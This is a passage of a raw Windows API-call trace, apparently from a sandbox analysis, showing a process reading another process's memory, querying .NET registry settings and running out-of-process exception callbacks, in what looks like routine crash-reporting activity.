hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x4c1ec7735c, nSize=0x4, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x4c1ec7735c*, lpNumberOfBytesRead=0x4c1ec77270*=0x4) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570134, lpBuffer=0x4c1ec77378, nSize=0x14, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x4c1ec77378*, lpNumberOfBytesRead=0x4c1ec77270*=0x14) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570148, lpBuffer=0x4c1ec77350, nSize=0x2, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x4c1ec77350*, lpNumberOfBytesRead=0x4c1ec77270*=0x2) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570148, lpBuffer=0x4c1ec774b0, nSize=0xf0, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x4c1ec774b0*, lpNumberOfBytesRead=0x4c1ec77270*=0xf0) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f000, lpBuffer=0x4c1ec77228, nSize=0x10, lpNumberOfBytesRead=0x4c1ec77160 | out: lpBuffer=0x4c1ec77228*, lpNumberOfBytesRead=0x4c1ec77160*=0x10) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f010, lpBuffer=0x4c1ec77220, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77160 | out: lpBuffer=0x4c1ec77220*, lpNumberOfBytesRead=0x4c1ec77160*=0x8) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f020, lpBuffer=0x4c1ec771a8, nSize=0x10, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec771a8*, lpNumberOfBytesRead=0x4c1ec770d0*=0x10) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f030, lpBuffer=0x4c1ec77198, nSize=0x8, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec77198*, lpNumberOfBytesRead=0x4c1ec770d0*=0x8) returned 1 [0078.349] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f0d0, lpBuffer=0x4c1ec77190, nSize=0x2, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec77190*, lpNumberOfBytesRead=0x4c1ec770d0*=0x2) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f038, lpBuffer=0x4c1ec77198, nSize=0x8, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec77198*, lpNumberOfBytesRead=0x4c1ec770d0*=0x8) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f0ea, lpBuffer=0x4c1ec77190, nSize=0x2, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec77190*, lpNumberOfBytesRead=0x4c1ec770d0*=0x2) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f0ec, lpBuffer=0x4c1ec771c0, nSize=0x3a, lpNumberOfBytesRead=0x4c1ec770d0 | out: lpBuffer=0x4c1ec771c0*, lpNumberOfBytesRead=0x4c1ec770d0*=0x3a) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f070, lpBuffer=0x4c1ec77228, nSize=0x10, lpNumberOfBytesRead=0x4c1ec77160 | out: lpBuffer=0x4c1ec77228*, lpNumberOfBytesRead=0x4c1ec77160*=0x10) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f080, lpBuffer=0x4c1ec77220, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77160 | out: lpBuffer=0x4c1ec77220*, lpNumberOfBytesRead=0x4c1ec77160*=0x8) returned 1 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f0b0, lpBuffer=0x4c1ec772c0, nSize=0x10, lpNumberOfBytesRead=0x4c1ec771e0 | out: lpBuffer=0x4c1ec772c0*, lpNumberOfBytesRead=0x4c1ec771e0*=0x10) returned 1 [0078.350] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x3ec) returned 0x22b349c39e0 [0078.350] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16f3f14c, lpBuffer=0x22b349c39e0, nSize=0x3ec, lpNumberOfBytesRead=0x4c1ec77270 | out: lpBuffer=0x22b349c39e0*, lpNumberOfBytesRead=0x4c1ec77270*=0x3ec) returned 1 [0078.433] GetCurrentProcess () returned 0xffffffffffffffff [0078.433] GetProcessAffinityMask (in: hProcess=0xffffffffffffffff, lpProcessAffinityMask=0x4c1ec763d0, lpSystemAffinityMask=0x4c1ec763e8 | out: lpProcessAffinityMask=0x4c1ec763d0, lpSystemAffinityMask=0x4c1ec763e8) returned 1 [0078.436] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc37f90000 [0078.437] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="AcquireSRWLockExclusive") returned 0x7ffc38a89d80 [0078.437] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="ReleaseSRWLockExclusive") returned 0x7ffc38a851a0 [0078.437] VirtualQuery (in: lpAddress=0x7ffc19d54000, lpBuffer=0x4c1ec76bc0, dwLength=0x30 | out: lpBuffer=0x4c1ec76bc0*(BaseAddress=0x7ffc19d54000, AllocationBase=0x7ffc19b90000, AllocationProtect=0x80, __alignment1=0xffffdd07, RegionSize=0x6000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0078.437] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x4, lpflOldProtect=0x7ffc19d3f7ec | out: lpflOldProtect=0x7ffc19d3f7ec*=0x2) returned 1 [0078.437] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffc37d10000 [0078.437] GetProcAddress (hModule=0x7ffc37d10000, lpProcName="RegOpenKeyExW") returned 0x7ffc37d24aa0 [0078.437] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x2, lpflOldProtect=0x4c1ec76c90 | out: lpflOldProtect=0x4c1ec76c90*=0x4) returned 1 [0078.438] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec76e10 | out: phkResult=0x4c1ec76e10*=0x0) returned 0x2 [0078.438] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec76e18 | out: phkResult=0x4c1ec76e18*=0x1fc) returned 0x0 [0078.438] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x4, lpflOldProtect=0x7ffc19d3f7ec | out: lpflOldProtect=0x7ffc19d3f7ec*=0x2) returned 1 [0078.438] GetProcAddress (hModule=0x7ffc37d10000, lpProcName="RegQueryValueExW") returned 0x7ffc37d24c60 [0078.438] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x2, lpflOldProtect=0x4c1ec76c90 | out: lpflOldProtect=0x4c1ec76c90*=0x4) returned 1 [0078.438] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec76e78, lpData=0x4c1ec76e08, lpcbData=0x4c1ec76e00*=0x4 | out: lpType=0x4c1ec76e78*=0x0, lpData=0x4c1ec76e08*=0x0, lpcbData=0x4c1ec76e00*=0x4) returned 0x2 [0078.438] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x4, lpflOldProtect=0x7ffc19d3f7ec | out: lpflOldProtect=0x7ffc19d3f7ec*=0x2) returned 1 [0078.439] GetProcAddress (hModule=0x7ffc37d10000, lpProcName="RegCloseKey") returned 0x7ffc37d24c50 [0078.439] VirtualProtect (in: lpAddress=0x7ffc19d54000, dwSize=0x70, flNewProtect=0x2, lpflOldProtect=0x4c1ec76c90 | out: lpflOldProtect=0x4c1ec76c90*=0x4) returned 1 [0078.439] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.440] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.440] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77010 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77010*=0x40) returned 1 [0078.440] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.441] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77010 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77010*=0x108) returned 1 [0078.441] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.441] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77010 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77010*=0x8) returned 1 [0078.441] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.441] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77040 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77040*=0x1c) returned 1 [0078.442] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.442] GetLastError () returned 0xcb [0078.442] SetLastError (dwErrCode=0xcb) [0078.442] GetLastError () returned 0xcb [0078.442] SetLastError (dwErrCode=0xcb) [0078.442] GetLastError () returned 0xcb [0078.442] SetLastError (dwErrCode=0xcb) [0078.444] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77560 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec77560*=0x8) returned 1 [0078.444] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.444] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec77560 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec77560*=0x98) returned 1 [0078.444] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.444] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77560 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec77560*=0x8) returned 1 [0078.444] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.444] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77560 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec77560*=0x8) returned 1 [0078.444] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.444] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec77648, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77550 | out: lpBuffer=0x4c1ec77648*, lpNumberOfBytesRead=0x4c1ec77550*=0x8) returned 1 [0078.445] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec77550 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec77550*=0x7c8) returned 1 [0078.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.445] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.445] GetProcessHeap () returned 0x22b349a0000 [0078.445] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a4a30 | out: hHeap=0x22b349a0000) returned 1 [0078.446] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec77520 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec77520*=0x198) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.446] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77550 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec77550*=0x8) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7420 [0078.446] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec77550 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec77550*=0x94) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7660 [0078.446] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec77550 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec77550*=0x14) returned 1 [0078.446] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c74e0 [0078.447] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77520 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec77520*=0x40) returned 1 [0078.447] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c71e0 [0078.447] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec77780, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec775f0 | out: lpBuffer=0x4c1ec77780*, lpNumberOfBytesRead=0x4c1ec775f0*=0xd50) returned 1 [0078.447] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec784d0, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec775f0 | out: lpBuffer=0x4c1ec784d0*, lpNumberOfBytesRead=0x4c1ec775f0*=0x8a0) returned 1 [0078.447] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb610 | out: hHeap=0x22b349a0000) returned 1 [0078.447] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.448] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.451] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.451] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7420 | out: hHeap=0x22b349a0000) returned 1 [0078.451] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7660 | out: hHeap=0x22b349a0000) returned 1 [0078.451] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c74e0 | out: hHeap=0x22b349a0000) returned 1 [0078.452] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c71e0 | out: hHeap=0x22b349a0000) returned 1 [0078.452] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.452] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.452] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.452] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.452] OutOfProcessExceptionEventDebuggerLaunchCallback () returned 0x0 [0078.779] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.779] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.779] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.780] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.780] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.780] GetThreadId (Thread=0x38c) returned 0x8cc [0078.780] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.780] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb4f0 [0078.780] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.780] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.780] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.780] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.780] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.780] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.780] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.780] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.780] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.780] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.781] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.781] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.781] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.781] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.781] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.781] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.781] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.781] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.781] GetLastError () returned 0xcb [0078.781] SetLastError (dwErrCode=0xcb) [0078.781] GetLastError () returned 0xcb [0078.781] SetLastError (dwErrCode=0xcb) [0078.781] GetLastError () returned 0xcb [0078.781] SetLastError (dwErrCode=0xcb) [0078.781] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.782] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.782] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7660 [0078.782] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.783] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c75a0 [0078.783] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.783] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7600 [0078.783] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.783] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c74b0 [0078.783] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.783] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb4f0 | out: hHeap=0x22b349a0000) returned 1 [0078.783] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.783] HeapFree (in: 